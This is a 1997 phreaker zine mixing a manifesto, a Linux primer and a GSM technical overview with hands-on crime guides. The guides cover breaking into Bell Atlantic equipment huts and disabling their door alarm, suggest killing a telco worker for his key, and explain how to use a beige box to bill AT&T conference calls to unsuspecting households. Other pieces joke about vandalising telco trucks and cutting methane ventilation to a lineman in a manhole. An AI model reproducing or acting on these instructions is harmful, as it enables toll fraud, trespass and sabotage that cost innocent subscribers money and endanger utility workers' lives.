Nation Phreaks Association Presents:

[NPA ASCII-art logo lost in extraction]
(ASCII art by KoSmoS)

A zine that's not full of shit

Opening Message From SKaLaR109 (founder of NPA)

There are times when the seriousness of a certain situation may forgo you to become very hateful toward the world, therefore causing you to have no care or take no responsibility for what you have done or do. This scenario is true in almost all aspects of life. Perhaps you obtained your interest in the arts of H/P by means of this way. Maybe not. The Government, along with various monopolies such as Bell (by the way, they claim not to be), Microsoft (speaks for itself), and Apple (HAHA yeah fucking right), wish to feed us lies about the state of our world and countries today. These lies have a name. That name is Conventional Wisdom. Every day we are fed lies. Lies about who we are. Lies about what we have achieved, about the past. History is written by those that conquer. Those that conquer are not always those that we can trust. Although we may have marveled at that great day in the 1960's when Man first set foot on a Hollywood stage and claimed it to be one small step for man, we still have hungry families and homeless that wish to be considered mankind. Why do we ridicule those that are less fortunate? Why do we fl0at around in a fucking space station that doesn't work while there are children that need to be fed and mothers that need medical attention? Why the fuck do we put people like Mitnick in jail when there are people that have babies and kill them by shoving toilet paper in their mouth and only get 1 1/2 years in jail for it? Do you see what I am saying?
While Telco sits back and charges an arm and a leg for services that should be free, another child dies from starvation. While the Government spends millions of dollars on bullshit encryption programs and flying wonders, another man dies from pneumonia because he didn't have insurance, so he couldn't go to the hospital. WHY the FUCK should I have to pay for higher education? I say fuck the assholes that sit back and get rich off of meaningless shit. Are we not entitled to education or knowledge? Are we not entitled to talk to whom we want when we please? Therefore I say to you, fellow Hackers and Phreakers: Fuck the Government and Telc0. Obtain all you can and how you can. If you have the skillz to, then DO SO. You must realize, though, that stupidity is not the key. The key is Knowledge. And if you carefully do what you do, you will not be penalized. Leave the trace of a f00l and pay the consequences. Finally I say to you... READ, and READ like you've never read before. Do not be afraid to spend money on anything that will be a source of knowledge to you (in other words, don't steal books). The authors deserve the money. In this zine you will find useful information on how to survive in this world as a Hacker and Phreak. Please use this information wisely. My last words to you are: Go and learn, for Knowledge is Power.

IMPORTANT NOTE!!! THIS ZINE HAS BEEN DIVIDED INTO A CERTAIN FORMAT... YOU WILL FIND BEGINNERS' FILES TOWARD THE BEGINNING OF THIS ZINE UNDER SECTION I, AND MORE TECHNICAL AND NON-BEGINNER ORIENTATED FILES TOWARD THE END UNDER SECTION II.

SKaLaR109/NPA 97

Opening Message From King Lazuras (Editor of NPA)

Hey, I'm King Lazuras, editor. We're a little late on this. My fault completely. Well, this should be a pretty good first issue. It doesn't have a red box issue like most new zines do, which I am quite happy about. Hell, you probably will actually learn from this.
I have read many zines in the past, and know most of them don't have more than 3 words of proper English, and the rest is K-R4D 31337!!!! So, we decided that this is going to be semi-correct. Not totally (after all, I am just some stupid little phreak....) but I will try.

INDEX:

1. Shout Outs
   a. From SKaLaR109
   b. From Aardwolf
   c. From King Lazuras
2. Writers/Editors/Other Important People List

**********************SECTION I******************* (Beginner Files)

3. Articles
   a. Bell Huts By Kosmos
   b. Setting Up An Emergency Kit By Aardwolf
   c. Linux: A Beginners Tutorial Part 1: Basic Information By BurntToad
   d. Conference Set-Up By Madk0w
   e. Bell And Other Telco Trucks By Aardwolf

********************Section II**************** (AdvanCeD FilEZ)

   a. THE IN'S AND OUT'S OF GSM Part 1 by Master_y0da
   b. EQUIBELL-ALT P DICTIONARY by KoSmoS
   c. Advanced CGI Exploitation... by IsolationX
   d. Octel Systems by De-Format
   e. My Unix Port Hand Book by Master_y0da
   f. Using a Guest Lynx Account by Electric_Nectar
   g. URL Of The Month by SKaLaR109
4. Closing Ceremonies

SHOUT OUTS
____________________________

From SKaLaR109:
I'd like to give a shout out to all the H/P community because we are all equal, my Mommy, and Clarity, who is the important lady in my life.

From Aardwolf:
NONE

From King Lazuras:
2600 (I have met most of the 2600 crowd, even though they probably don't remember me. Emanuel might 'cause I got him annoyed 'cause I talk too fast... I do...)
Pam (she knows who she is, she rocks)
Wolfgame (he knows who he is too, and he drove me to dinner a bunch of times after 2600 meetings)
Iggy ('cause he was the first person to actually remember me as Laz and not king, and he knows who he is too.)
My IRC Buddies -- IsolationX, delphian, ultram (he is gonna yell for me putting his name here), de-format
--A LOT OF OTHER PEOPLE!!!!-- (Too many people to list... Besides, not sure if anyone would want to be associated with me. :) )

Writers/Editors/Other Important People List
___________________________________________________________

Administration
1. SKaLaR109 -- The Cool Dude That Started NPA (Founder)
2. Aardwolf -- Cool Dude That Does Sooo Much, But Nothing Specific
3. King Lazuras -- Chief Editor (not such a cool dude, just me)

NPA Writing Staff (and a damn good one, might I add):
Collins, Hotwire, Madk0w, Hype, Sun_Fed_Darkness, X-Human, A_Clockwork_Orange, Master Yoda, Kosmos, TheViking, NivFreak, De-Format, BurntToad, IsolationX, Info234, Electric Nectar, Heyitsme, Technics, Krazy_Tunez, Kalony, Strykereye

Articles
_________________________

A. BELL ATLANTIC HUTS
__________________
By Kosmos 1997

INTRODUCTION
------------
Almost all of us have been in the situation where we say, "Is there not a challenge?" Well, first, you're too cocky, and second, no. In my area of Bell we have something we call a BELL HUT: a small building made of concrete with the classic light and dark tan of Bell Atlantic. In here you will find what is in those, how not to be busted being in it, and what not to do in it.

HOW TO GET IN
-------------
Your classic brute forcing is always an option, yet you do not want to leave all those scratches on the pretty Bell place, so if you can kill a Bell man and get the key, or utilize that knowledge and lockpick it.

ONCE YOU'RE IN
--------------
Getting in was your problem; now I am guessing you do not want a cop on you. Well, look up in the upper left hand part of the doorway (on the frame). You see that "thing"? Well, if you just opened the door it is sending signals to the CO telling them that it is open. Not to worry though, 'cause you were smart and read Kosmos' file. If you pull out the "knob" you will close off the signal (diagram later). You see, when the door is closed it is pushed in fully, closed (circuit); when you open it is half-way, open (circuit); when you pull it is fully open, closed (circuit). Now you're safe, from that anyway; you still need to worry about noise, being obvious, etc...
WHAT TO DO NOW THAT YOU'RE SAFE
-------------------------------
This hut is running a good full 10-20 blocks of houses, possibly more. But do NOT touch a thing, unless having a couple thousand volts through you sounds good. On one of the 2 long walls will be a grounder, a wrist band that will ground you so you don't fry. Now what you do with the copper is your problem, but you can splice, clip, and there is usually a phone on the wall. Now I have also seen a Flat Box (a flat 2-3 foot tall, 1 foot wide, 3-4 in thick box) just up on the wall; if you know what you're doing in there, go for it. (On a flat, when you open it there are 2 columns of pins, grouped in 4 pins; clip to the upper most right one, go over one, down one and clip there too, bingo, dial-tone.) Anyway there are also cabinets and God knows what is in there, usually a couple manuals. If you can take your time and glance around, I have no idea what you'll find near you.

THE KEY
-------
No sorry, not the key to the hut, the key of what to do when you're in. At the copper all you will see is rows and rows of black rectangles; either fold them up or down, or open them like a cabinet, there are your wires ^_^

WHAT NOT TO DO
--------------
I just wanted to accent on this because I do not want to read "Phreak found Phried" in the newspaper. PLEASE DO NOT TOUCH A THING WITHOUT BEING GROUNDED!!!

TIPS
----
-Have a friend sit out front with his bike like he is taking a break so he can notify you of a Telco truck coming, or something like that.
-Be paranoid, be very paranoid.
-Look, Listen, and Think. You may be very interested at finding something I may have overlooked. You never know.
-Remember where you are and utilize that, everyone wants a conf. Be kind ^_^

DIAGRAM
-------
[Door-sensor diagram lost in extraction. Legend: % = Conductor, ^ = On (circuit), * = Off (circuit)]

B. Setting Up An Emergency Kit
___________________________
By Aardwolf 1997

Introduction:
-------------
Picture this: You were almost caught stealing car phones, you are out and do not have a kit, the FEDS are at your house, or any other emergency. What do you do? Well, if you didn't read this file you would probably last about a week and finally get caught or die. Yet if you do read, you will be prepared and would last a long time. The following file will explain the construction and setting up of an emergency kit.

How it works:
-------------
Basically it's a backpack or something in the woods in a tree with a waterproof cover on it that has stuff you need in it to survive. When something happens and you need it you just go to that place in the woods and get it. Then you have all the resources you put in it.

What you should have:
---------------------
-Money (doesn't matter how much, $20 will last a long time if you know how to)
-Food (crackers or other things that are filling that do not go bad are great)
-Phield Phreaking Kit (For them calls)
-Change of underwear (I wonder why)
-Small wool blanket or something (it does get cold)
-Matches, Lighter
-Flashlight
-Toilet paper (or just steal it from your local 7-11's bathroom)
-NPA's file on loitering, surviving, and other cool shit
-Hat/beanie (20% of heat loss is through your head)
-Paper, Pen (Might need 'em)
-List of numbers, family members, lawyers
-Anything you think you will need or you can fit in your backpack

Placing:
--------
You should put it in a place like the woods, and it should be close to somewhere you can get to easily. Just do not forget where it is! This thing might seem dumb but you will wish you had it when you are wanted by the FBI.

C. Linux: A Beginners Tutorial Part 1: Basic Information
___________________________
By BurntToad 1997

1) Basic Commands:
--------------
Learning Linux isn't easy, but its power and the many ways it can be customized make it worth the effort.
If you think back to the first time you saw DOS's C: prompt and had no idea what to do, you will feel that way the first time you see the Linux prompt; depending on the shell you are using the prompt will either be a $, a % or some other symbol like it, but the idea is the same. At this prompt you can either start up a program, manipulate files, or configure your system.

Figure 1.0
-------------------------------------------------------------------------
UNIX    DOS     Action
-------------------------------------------------------------------------
ls      dir     Displays information about files and directories.
cd      cd      Changes the current directory.
cp      copy    Copies files from one directory to another.
mv      move    Moves a file to another directory.
rm      del     Removes a file.
mkdir   mkdir   Creates a new directory.
rmdir   rmdir   Removes a directory.
man     help    Displays help for a requested command.
more    more    Displays a file, pausing at the end of each screen.
cat     type    Displays the contents of a file.
grep    ------  Displays the lines in a file that match a given pattern.
chmod   attrib  Sets permissions on files and directories.
chown   ------  Changes the ownership of the specified file(s).
df      dir     Displays the amount of free space on the disk.
wc      ------  Provides a count of words or characters in a file.
-------------------------------------------------------------------------

Fig. 1.0 shows some of the more basic UNIX commands. There are differences between the DOS and UNIX versions of specific commands. For the most part, UNIX commands have far more switches (options) available than their DOS relatives, and more are added as users demand them. More importantly, UNIX was designed from the ground up as a multi-user network system, so commands like chmod and chown are crucial for security. The commands in Fig. 1.0 will help you get started, but don't be surprised if you run into difficulties. You'll find that some programs do not appear to be doing anything and others have a very strange command system with no menu to help.
The text editor vi is one; you might expect to load it then just start typing, but it doesn't work that way. Instead, you have to press the letter i for insert mode and then start typing. When it comes to saving the file, UNIX programmers like the more accurate term "write", and they create their interfaces accordingly. Manual pages might be meant as help, but are usually far too detailed, and just confuse the average user. Be careful when you use the rm command, because when you delete a file it is gone forever and cannot be undeleted.

2) UNIX Does Windows:
-----------------
The X Window System, variously called X Windows, X Window, or just X, is the primary graphical interface for UNIX, and can be activated by typing startx or xdm. Unlike Windows 95 or NT, X Windows separates the base system and the windowing system. The actual objects you see on the X desktop, including everything from icons to toolbars to menus, come from a program called a window manager. Think of it this way: if you could completely replace your Windows 95 desktop with a different system of managing UI objects and window designs, with only the core OS components running underneath, you'd be closer to the X Windows model. The most popular window manager is called fvwm, which is a stripped down model of twm, the powerful but memory hungry window manager that comes with X11 proper. Other window managers include mwm (the Motif window manager) and olwm (Sun Microsystems' Open Look interface). X Windows was designed around the three button mouse, so it's a good idea to have one.

3) Installing And Configuring X Windows
---------------------------------------
Getting used to X isn't a problem, but getting it up and running may be. Typically, you install it from the CD-ROM or FTP site. In Red Hat 4.1 and Caldera OpenLinux Base, the installation is more or less automatic. It's one thing, however, to copy a system's files onto your hard disk, and yet another to make them work with your hardware.
That's where many would-be Linux users give up. Once you have it up and running, the next question is what you can do with it. The answer is, quite simply, anything. True, X won't run Windows applications (except with an emulator like WINE, which is now in the making), but many of the more popular software packages are made into a UNIX version, like Netscape Navigator, or Corel WordPerfect for UNIX, or even DOOM. The combination of Linux and XFree86 offers a rich, powerful, and complex operating system with excellent scalability and constant new development. At first you may find yourself back in Windows more so than Linux, and you may wonder why you used up a big chunk of your hard disk for something you do not even use. Eventually you will spend more and more time in Linux. The fact is, together Linux and X let you build a system suited precisely to your needs and to your network, with freely available development tools at your disposal. You need a lot of time to learn Linux well, but you'll find that the time was well spent. XFree86 is just a version of the MIT X Window System and is available for System V/386, 386BSD, and other x86 UNIX implementations. X11R6 is just X Windows in UNIX.

Any questions can be emailed to: BurntToad@hotmail.com

D. Conference Set-Up
_________________
By Madk0w 1997

This is the first submission I've made to the NPA, and I'll be talking about Meet-Me conferences and Dial-In Bridges, how to set them up, and methods of billing (not that we pay, of course). The most popular and the most convenient conferences are of course the AT&T Dial-In bridges. These are the conferences that most everyone is familiar with. As I found out, I have more fun setting them up than actually calling into them, but that's just me I guess. First things first, to set up conferences you must Beige Box, or use a COCOT. I like to Beige Box, because this is the most convenient way, so we'll just stick with that for now.
Now I will not be explaining what a Beige is or how to make one, since there are probably more T-files on that box than any other. You can even find them on your local PD board. But get your beige box and get ready to field phreak. This is just a suggestion, but before you get out there and hook up I would have the info and equipment you will need to set up the conference. You don't need a lot of shit. All you need is a pen and a piece of paper, and maybe something hard to write on. I recommend a pen over a pencil for obvious reasons. It would not be cool to break your lead while on the phone with the Meet-Me operator. On the piece of paper you should write the number of the Tele-Conference service and either your local ANI or an 800. I will post all the numbers and other information you will need to know at the end of this article. OK, when you have all your equipment, go hook up your beige to wherever you beige from. Now the only time I beige it's never from the same location. Since it's usually at different times of the night, I never know if the owner of the phone line is home or not. So what I've found to work best is when you're hooking up to your line, make sure it has call waiting. The operator will call you back after you set up the conference, and having the owner of the phone line pick up his phone could lead to some very uncomfortable moments! You can find a line with call waiting by hitting *70 on every line until you hear the three short dial tones. I hope everyone knows what I mean. Anyway, call the ANI and write the number down, because the operator will ask you what number you're calling from; this is how they bill the number. Next call the Tele-Conference service and set up your Meet-Mes. The rest is basically talking with the operator and bullshitting her (or BullSHit as Visionary would say). I'm not gonna tell you what to say to her.
I mean, it might take you a couple of tries before you know what to say and are convincing enough, but I will tell you this: keep it short and simple. As Dead Kat and I have found out, it's easier to just say: "I need six conferences set for the 1st, 2nd, 3rd, etc. of December... from 6pm to 2:00am EST... and I want to bill them to the number I'm calling from..." There's no need to make one call for every conference. Oh, and I almost forgot, she will ask you how many ports you want. What she means is how many lines in do you want. You can have up to 20 ports, but I would not recommend this at all. Twenty people on a conference tends to make it hard to talk to anyone. I would say no more than ten, maybe 15 if you know a shit load of people will call, but ten should do the trick. As soon as you hang up with her, dial a number that you know will ring and that will let you stay on for a few minutes. A good example is a VMB with a long greeting, or maybe a number that just rings forever. I use 1-800-777-8854 just because I don't like the people that work there. Stay on the line until you hear the call waiting beep and just click over. When you answer, the op will tell you the PINs and numbers for the conferences. Just work with what you have; you probably will have your own style and what not, but let me mention this: the op will give you a "Host PIN". This is for the person who set it up and no one else. Just some advice, don't call the conference direct and use this code. You'll end up paying for the meet-me. Well, it's easy. All you need is a beige box, a place to beige, and the 800 number. Here are the numbers for the AT&T conferences. These numbers are basically the same; you can call either one and set them up.
1-800-232-1111 -AT&T Conference Set-up
1-800-544-6363 -AT&T Conference Set-up
0-700-456-1000 -AT&T's Alliance Teleconferencing
0-700-456-2000 -AT&T's Alliance Teleconferencing
1-800-544-6363 -AT&T's Alliance Teleconferencing
1-800-366-2663 -Sprint Teleconference
1-800-487-9240 -ANI
1-800-444-4444 -press 1 and wait for ANI

Next issue of NPA I'll tell you how to set up a conference using Worldvox. And I thought I'd give you a little bit of info... I called the AT&T Conference Set-up # and the price per minute is about $.55 a minute per line plus a $15.00 setup fee, so after the conference add up the approx. amount of people that were on and how long the conference was up for and find out how much of a bill it is. I'm sure the people whose house you beige from won't be happy when they get their $1000+ bill. Heh!

E. Bell and other Telco Trucks
___________________________
By Aardwolf 1997

Introduction:
-------------
Telco trucks. We all know and love them... As we all know they come in many flavors and colors, but who really really understands them? What is in them? What is their gas mileage? And how the hell do they drive them pieces of shit? The above questions may or may not be answered in this file, so do not blink and eat your corn.

Telco Van:
----------
Dodge Ram 2500. Comes in white, gray, and green and gray (1970's). Used by a wide variety of Bell guys (Install, Repair, Splices). Contain common equipment including shovels and manuals. Have yellow flashy light on roof. Very common.

Telco Car:
----------
Gray and white. Have simple equipment (test set and some tools). Used by CO-Tech and Engineers. May make home visits but mainly for business use. Does not have yellow flashy light on roof. Not very common. Usually found around CO's and sometimes truck yards.

Telco Truck:
------------
White or gray. Used by some of the other Bell guys. Usually emergency vehicles for if a cable is cut or digging. May or may not have test set depending on area. Manuals and maps.
And picks, axes, and shovels. Good amount of 'em but not as common as vans. Do have yellow flashy thingy.

Telco Bucket Truck
------------------
Very cool trucks. Just about as common as normal trucks depending on the area. These suckers have a crane with a large bucket in 'em. They have common equipment (test set, shovels, etc....). Bell uses these suckers for working on aerial lines. Only the true linemen use these, not the install and repair or other guys. These guys have been with Telco for a while and know what they are doing. They are usually white or gray like normal trucks. They do have a flashy yellow thingy, and a lot of equipment like road cones, umbrellas, and lots of aerial cable and shit.

Telco Armored Trucks:
---------------------
These trucks are funky looking. They look like a bank's armored car but are Bell's. I have only seen white ones. They have front windows and that's it. They are shaped like a hi-tech ambulance. They carry ladders and have a yellow flashy thingy. They have the common equipment, along with digging tools like mad! They have cabinets on the sides (locked :() which have tools up the bunghole. They also can be used as mobile Bell bases. These are very uncommon and are mostly by Bell huts or manholes. If you see one put that sledge hammer to use. :)

Telco Trailer:
--------------
This is a trailer that hooks on to the back of Telco trucks and vans. They use these when they go in manholes. They are used to provide the lineman inside with power and light, and to filter out the methane gases. They are only found when Bell's in the manholes. Wouldn't it be fun to turn it off while a lineman is in the vault? hehehe....

*********************Section II**********************

A. THE IN'S AND OUT'S OF GSM Part 1
by (\/)@ster Y0d@
mastyoda@concentric.net

During the early 1980s, analog cellular telephone systems were experiencing rapid growth in Europe, particularly in Scandinavia and the United Kingdom, but also in France and Germany.
Each country developed its own system, which was incompatible with everyone else's in equipment and operation. This was an undesirable situation, because not only was the mobile equipment limited to operation within national boundaries, which in a unified Europe were increasingly unimportant, but there was a very limited market for each type of equipment, so economies of scale, and the subsequent savings, could not be realized. The Europeans realized this early on, and in 1982 the Conference of European Posts and Telegraphs (CEPT) formed a study group called the Groupe Spécial Mobile (GSM) to study and develop a pan-European public land mobile system. The proposed system had to meet certain criteria: good subjective speech quality, low terminal and service cost, support for international roaming, ability to support handheld terminals, support for a range of new services and facilities, spectral efficiency, and ISDN compatibility. In 1989, GSM responsibility was transferred to the European Telecommunication Standards Institute (ETSI), and phase I of the GSM specifications was published in 1990. Commercial service was started in mid-1991, and by 1993 there were 36 GSM networks in 22 countries, with 25 additional countries having already selected or considering GSM [DS93]. This is not only a European standard - South Africa, Australia, and many Middle and Far East countries have chosen GSM. By the beginning of 1994, there were 1.3 million subscribers worldwide [Nil]. The acronym GSM now (aptly) stands for Global System for Mobile telecommunications.

The developers of GSM chose an unproven (at the time) digital system, as opposed to the then-standard analog cellular systems like AMPS in the United States and TACS in the United Kingdom. They had faith that advancements in compression algorithms and digital signal processors would allow the fulfillment of the original criteria and the continual improvement of the system in terms of quality and cost.
The 8000 pages of the GSM recommendations try to allow flexibility and competitive innovation among suppliers, but provide enough guidelines to guarantee the proper interworking between the components of the system. This is done in part by providing descriptions of the interfaces and functions of each of the functional entities defined in the system.

2 Services provided by GSM

References: [Har93a, Har93b, DS93, FR93, LM92, Hub92]

From the beginning, the planners of GSM wanted ISDN compatibility in services offered and control signalling used. The radio link imposed some limitations, however, since the standard ISDN bit rate of 64 kbps could not be practically achieved.

Using the ITU-T definitions, telecommunication services can be divided into bearer services, teleservices, and supplementary services. The digital nature of GSM allows data, both synchronous and asynchronous, to be transported as a bearer service to or from an ISDN terminal. Data can use either the transparent service, which has a fixed delay but no guarantee of data integrity, or a non-transparent service, which guarantees data integrity through an Automatic Repeat Request (ARQ) mechanism, but with a variable delay. The data rates supported by GSM are 300 bps, 600 bps, 1200 bps, 2400 bps, and 9600 bps [Har93a].

The most basic teleservice supported by GSM is telephony. There is an emergency service, where the nearest emergency-service provider is notified by dialling three digits (similar to 911). Group 3 fax, an analog method described in ITU-T recommendation T.30 [Har93b], is also supported by use of an appropriate fax adaptor. A unique feature of GSM compared to older analog systems is the Short Message Service (SMS). SMS is a bidirectional service for sending short alphanumeric (up to 160 bytes) messages in a store-and-forward fashion. For point-to-point SMS, a message can be sent to another subscriber to the service, and an acknowledgement of receipt is provided to the sender.
SMS can also be used in a cell-broadcast mode, for sending messages such as traffic updates or news updates. Messages can be stored in the SIM card for later retrieval [Bal93].

Supplementary services are provided on top of teleservices or bearer services, and include features such as caller identification, call forwarding, call waiting, multi-party conversations, and barring of outgoing (international) calls, among others.

3 Architecture of the GSM network

References: [DS93, FR93, B+93, LM92, Hub92, Rah93, SK93]

A GSM network is composed of several functional entities, whose functions and interfaces are defined. Figure 1 shows the layout of a generic GSM network. The GSM network can be divided into three broad parts. The Mobile Station is carried by the subscriber; the Base Station Subsystem controls the radio link with the Mobile Station. The Network Subsystem, the main part of which is the Mobile services Switching Center, performs the switching of calls between the mobile and other fixed or mobile network users, as well as management of mobile services, such as authentication. Not shown is the Operations and Maintenance Center, which oversees the proper operation and setup of the network. The Mobile Station and the Base Station Subsystem communicate across the Um interface, also known as the air interface or radio link. The Base Station Subsystem communicates with the Mobile services Switching Center across the A interface.

3.1 Mobile Station

The mobile station (MS) consists of the physical equipment, such as the radio transceiver, display and digital signal processors, and a smart card called the Subscriber Identity Module (SIM). The SIM provides personal mobility, so that the user can have access to all subscribed services irrespective of both the location of the terminal and the use of a specific terminal.
By inserting the SIM card into another GSM cellular phone, the user is able to receive calls at that phone, make calls from that phone, or receive other subscribed services.

The mobile equipment is uniquely identified by the International Mobile Equipment Identity (IMEI). The SIM card contains the International Mobile Subscriber Identity (IMSI), identifying the subscriber, a secret key for authentication, and other user information. The IMEI and the IMSI are independent, thereby providing personal mobility. The SIM card may be protected against unauthorized use by a password or personal identity number.

3.2 Base Station Subsystem

The Base Station Subsystem is composed of two parts, the Base Transceiver Station (BTS) and the Base Station Controller (BSC). These communicate across the specified A-bis interface, allowing (as in the rest of the system) operation between components made by different suppliers.

The Base Transceiver Station houses the radio transceivers that define a cell and handles the radio-link protocols with the Mobile Station. In a large urban area, there will potentially be a large number of BTSs deployed. The requirements for a BTS are ruggedness, reliability, portability, and minimum cost.

The Base Station Controller manages the radio resources for one or more BTSs. It handles radio-channel setup, frequency hopping, and handovers, as described below. The BSC is the connection between the mobile and the Mobile services Switching Center (MSC). The BSC also translates the 13 kbps voice channel used over the radio link to the standard 64 kbps channel used by the Public Switched Telephone Network or ISDN.

3.3 Network Subsystem

The central component of the Network Subsystem is the Mobile services Switching Center (MSC).
It acts like a normal switching node of the PSTN or ISDN, and in addition provides all the functionality needed to handle a mobile subscriber, such as registration, authentication, location updating, handovers, and call routing to a roaming subscriber. These services are provided in conjunction with several functional entities, which together form the Network Subsystem. The MSC provides the connection to the public fixed network (PSTN or ISDN), and signalling between functional entities uses the ITU-T Signalling System Number 7 (SS7), used in ISDN and widely used in current public networks. The Home Location Register (HLR) and Visitor Location Register (VLR), together with the MSC, provide the call-routing and (possibly international) roaming capabilities of GSM. The HLR contains all the administrative information of each subscriber registered in the corresponding GSM network, along with the current location of the mobile. The current location of the mobile is in the form of a Mobile Station Roaming Number (MSRN), which is a regular ISDN number used to route a call to the MSC where the mobile is currently located. There is logically one HLR per GSM network, although it may be implemented as a distributed database. The Visitor Location Register contains selected administrative information from the HLR, necessary for call control and provision of the subscribed services, for each mobile currently located in the geographical area controlled by the VLR. Although each functional entity can be implemented as an independent unit, most manufacturers of switching equipment implement one VLR together with one MSC, so that the geographical area controlled by the MSC corresponds to that controlled by the VLR, simplifying the signalling required. Note that the MSC contains no information about particular mobile stations - this information is stored in the location registers. The other two registers are used for authentication and security purposes.
The Equipment Identity Register (EIR) is a database that contains a list of all valid mobile equipment on the network, where each mobile station is identified by its International Mobile Equipment Identity (IMEI). An IMEI is marked as invalid if it has been reported stolen or is not type approved. The Authentication Center is a protected database that stores a copy of the secret key stored in each subscriber's SIM card, which is used for authentication and ciphering of the radio channel. The key itself is never sent over the air: the network issues a challenge and the SIM answers with a value derived from the key, so the only two holders of a subscriber's key are the SIM and the Authentication Center, and a compromise of the latter exposes every subscriber on the network. 4 Radio link aspects References: [Che91, Bal91, Bal93, Rah93, Wat93] The International Telecommunication Union (ITU), which manages the international allocation of radio spectrum (among other functions), allocated the bands 890-915 MHz for the uplink (mobile station to base station) and 935-960 MHz for the downlink (base station to mobile station) for mobile networks in Europe. Since this range was already being used in the early 1980s by the analog systems of the day, the CEPT had the foresight to reserve the top 10 MHz of each band for the GSM network that was still being developed. Eventually, GSM will be allocated the entire 2x25 MHz bandwidth. Since radio spectrum is a limited resource shared by all users, a method must be devised to divide up the bandwidth among as many users as possible. The method chosen by GSM is a combination of Time- and Frequency-Division Multiple Access (TDMA/FDMA). The FDMA part involves the division by frequency of the total 25 MHz bandwidth into 124 carrier frequencies of 200 kHz bandwidth. One or more carrier frequencies are then assigned to each base station. Each of these carrier frequencies is then divided in time, using a TDMA scheme, into eight time slots. One time slot is used for transmission by the mobile and one for reception. They are separated in time so that the mobile unit does not receive and transmit at the same time, a fact that simplifies the electronics.
In the rest of this section, the procedure involved in digitally transmitting a voice signal in a GSM network is examined, along with some of the features, such as discontinuous transmission and reception, used to improve voice quality, reduce the mobile unit's power consumption, and increase the overall capacity of the network. 4.1 Channel structure The structure of the most common time-slot burst is shown in Figure 2. A total of 156.25 bits is transmitted in 0.577 milliseconds, giving a gross bit rate of 270.833 kbps. There are three other types of burst structure for frame and carrier synchronization and frequency correction. The 26-bit training sequence is used for equalization, as described below. The 8.25 bit guard time allows for some propagation time delay in the arrival of bursts. Each group of eight time slots is called a TDMA frame, which is transmitted every 4.615 ms. TDMA frames are further grouped into multiframes to carry control signals. There are two types of multiframe, containing 26 or 51 TDMA frames. The 26-frame multiframe contains 24 Traffic Channels (TCH) and two Slow Associated Control Channels (SACCH) which supervise each call in progress. The SACCH in frame 12 contains eight channels, one for each of the eight connections carried by the TCHs. The SACCH in frame 25 is not currently used, but will carry eight additional SACCH channels when half-rate traffic is implemented. A Fast Associated Control Channel (FACCH) works by stealing slots from a traffic channel to transmit power control and handover-signalling messages. The channel stealing is done by setting one of the control bits in the time slot burst. In addition to the Associated Control Channels, there are several other control channels which (except for the Stand-alone Dedicated Control Channel) are implemented in time slot 0 of specified TDMA frames in a 51-frame multiframe, implemented on a non-hopping carrier frequency in each cell. 
The control channels include: Broadcast Control Channel (BCCH): Continually broadcasts, on the downlink, information including base station identity, frequency allocations, and frequency-hopping sequences. Stand-alone Dedicated Control Channel (SDCCH): Used for registration, authentication, call setup, and location updating. Implemented on a time slot, together with its SACCH, selected by the system operator. Common Control Channel (CCCH): Made up of three control channels used during call origination and call paging. Random Access Channel (RACH): A slotted Aloha channel used to request access to the network. Paging Channel (PCH): Used to alert the mobile station of an incoming call. Access Grant Channel (AGCH): Used to allocate an SDCCH to a mobile for signalling, following a request on the RACH. 4.2 Speech coding References: [NHdB89, V+89, S+89] GSM is a digital system, so speech signals, inherently analog, have to be digitized. The method employed by ISDN, and by current telephone systems for multiplexing voice lines over high speed trunks and optical fiber lines, is Pulse Coded Modulation (PCM). The output stream from PCM is 64 kbps, too high a rate to be feasible over a radio link. The 64 kbps signal contains much redundancy, although it is simple to implement. The GSM group studied several voice coding algorithms on the basis of subjective speech quality and complexity (which is related to cost, processing delay, and power consumption once implemented) before arriving at the choice of a Regular Pulse Excited - Linear Predictive Coder (RPE-LPC) with a Long Term Predictor loop. Basically, information from previous samples, which does not change very quickly, is used to predict the current sample. The coefficients of the linear combination of the previous samples, plus an encoded form of the residual, the difference between the predicted and actual sample, represent the signal.
Speech is divided into 20 millisecond samples, each of which is encoded as 260 bits, giving a total bit rate of 13 kbps.

4.3 Channel coding and modulation

Due to natural or man-made electromagnetic interference, the encoded speech or data transmitted over the radio interface must be protected as much as is practical. The GSM system uses convolutional encoding and block interleaving to achieve this protection. The exact algorithms used differ for speech and for different data rates. The method used for speech blocks will be described below. Recall that the speech codec produces a 260 bit block for every 20 ms speech sample. From subjective testing, it was found that some bits of this block were more important for perceived speech quality than others. The bits are thus divided into three classes:
Class Ia   50 bits - most sensitive to bit errors
Class Ib  132 bits - moderately sensitive to bit errors
Class II   78 bits - least sensitive to bit errors
Class Ia bits have a 3 bit Cyclic Redundancy Check (CRC) added for error detection. If an error is detected, the frame is judged too damaged to be comprehensible and it is discarded. It is replaced by a slightly attenuated version of the previous correctly received frame. These 53 bits, together with the 132 Class Ib bits and a 4 bit tail sequence (a total of 189 bits), are input into a 1/2 rate convolutional encoder of constraint length 5 (four memory elements): each input bit is encoded as two output bits, computed from it and the previous 4 input bits, and the four zero tail bits flush the encoder at the end of each block. The convolutional encoder thus outputs 378 bits, to which are added the 78 remaining Class II bits, which are unprotected. Thus every 20 ms speech sample is encoded as 456 bits, giving a bit rate of 22.8 kbps. To further protect against the burst errors common to the radio interface, each sample is diagonally interleaved. The 456 bits are divided into 8 blocks of 57 bits, and these blocks are transmitted in eight consecutive time-slot bursts.
Since each time-slot burst can carry two 57 bit blocks, each burst carries traffic from two different speech samples. Recall that each time-slot burst is transmitted at a gross bit rate of 270.833 kbps. This digital signal is modulated onto the analog carrier frequency, which has a bandwidth of 200 kHz, using Gaussian-filtered Minimum Shift Keying (GMSK). GMSK was selected over other modulation schemes as a compromise between spectral efficiency, complexity of the transmitter, and limited spurious emissions. The complexity of the transmitter is related to power consumption, which should be minimized for the mobile station. The spurious radio emissions, outside of the allotted bandwidth, must be strictly controlled so as to limit adjacent channel interference, and allow for the co-existence of GSM and the older analog systems (at least for the time being). 4.4 Multipath equalization At the 900 MHz range, radio waves bounce off everything - buildings, hills, cars, airplanes, etc. Thus many reflected signals, each with a different phase, can reach an antenna. Equalization is used to extract the desired signal from the unwanted reflections. Equalization works by finding out how a known transmitted signal is modified by multipath fading, and constructing an inverse filter to extract the rest of the desired signal. This known signal is the 26-bit training sequence transmitted in the middle of every time slot burst. The actual implementation of the equalizer is not specified in the GSM specifications. 
